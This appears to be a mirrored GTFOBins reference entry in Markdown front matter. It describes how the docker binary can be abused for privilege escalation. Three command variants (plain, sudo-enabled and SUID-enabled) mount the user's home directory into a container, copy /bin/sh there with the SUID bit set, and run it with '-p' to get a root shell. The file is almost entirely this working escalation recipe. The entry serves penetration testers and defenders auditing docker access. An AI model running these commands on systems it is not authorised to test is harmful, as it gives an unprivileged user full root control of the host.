mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
20 lines
837 B
Markdown
20 lines
837 B
Markdown
---
|
|
description: |
|
|
Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
|
|
|
|
This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
|
|
functions:
|
|
execute-interactive:
|
|
- code: |
|
|
docker run --rm -v /home/$USER:/h_docs ubuntu \
|
|
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
|
|
sudo-enabled:
|
|
- code: |
|
|
sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
|
|
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
|
|
suid-enabled:
|
|
- code: |
|
|
./docker run --rm -v /home/$USER:/h_docs ubuntu \
|
|
sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
|
|
---
|